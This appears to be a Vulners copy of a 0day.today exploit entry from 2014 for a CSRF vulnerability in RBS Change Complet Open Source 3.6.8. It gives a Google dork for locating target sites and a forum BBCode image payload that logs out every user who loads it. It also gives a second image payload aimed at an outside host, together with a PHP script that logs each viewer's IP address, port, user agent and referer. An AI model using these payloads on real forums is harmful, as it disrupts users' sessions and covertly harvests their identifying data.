Lucene search
K

RBS Change Complet Open Source 3.6.8 - CSRF Vulnerability

🗓️ 02 Oct 2014 00:00:00Reported by Krusty HackType 
zdt
 zdt
🔗 0day.today👁 22 Views

RBS Change Complet Open Source 3.6.8 - CSRF Vulnerability Exploi

Code
# Exploit Title: RBS Change Complet Open Source CSRF
# Google Dork: intext:"une réalisation rbs"
# Date: 10/01/2014
# Exploit Author: KrustyHack
# Vendor Homepage: http://www.rbschange.fr/
# Software Link: http://www.rbschange.fr/addons/distributions/RBS-Change-complet-Open-Source,67203.html
# Version: 3.6.8
# Tested on: Linux
 
HOW TO
======
 
Just add [img="http://CSRF"][/img] on forum signature or forum posts.
 
TEST
====
 
Based on demo.rbschange.fr:
---------------------------
 
[img="http://server/fr/deconnexion/"][/img]
 
Will disconnect all users who load the image.
 
Other example:
--------------
 
[img="http://www.example.com/log.php"][/img]
 
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$ip_proxy = $_SERVER['HTTP_X_FORWARDED_FOR'];
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
 
file_put_contents("log.txt", "[".date('l jS \of F Y h:i:s A')."] [$ip_proxy]$ip -  $rem_port - $user_agent - $rqst_method - $rem_host - $referer\n", FILE_APPEND);
 
?>
 
To get users ip, user agent, ...

#  0day.today [2018-01-08]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation